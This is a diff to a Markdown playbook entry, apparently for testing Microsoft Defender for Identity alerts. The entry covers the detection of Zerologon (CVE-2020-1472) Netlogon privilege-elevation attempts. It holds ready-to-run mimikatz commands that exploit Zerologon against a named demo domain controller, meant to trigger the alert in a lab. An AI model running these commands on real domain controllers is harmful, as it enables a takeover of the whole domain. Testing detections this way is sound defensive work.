DanielpFR/MDI/MDI_Playbook_Sample.md

 ## 13 - Suspected Neltogon privilege elevation attempt (CVE-2020-1472 exploitation)
 The alert is triggered if an attacker attempts to establish a vulnerable Netlogon secure channel connection to a DC, using the Netlogon Remote Protocol (MS-NRPC), also known as Netlogon Elevation of Privilege Vulnerability.

-From a command line run:
+From a command line on a workstation run with a local admin account:

 *mimikatz # privilege::debug*
 *mimikatz # lsadump::zerologon /server:msdemo-DC01.msdemo.local /account:msdemo-DC01$ /exploit*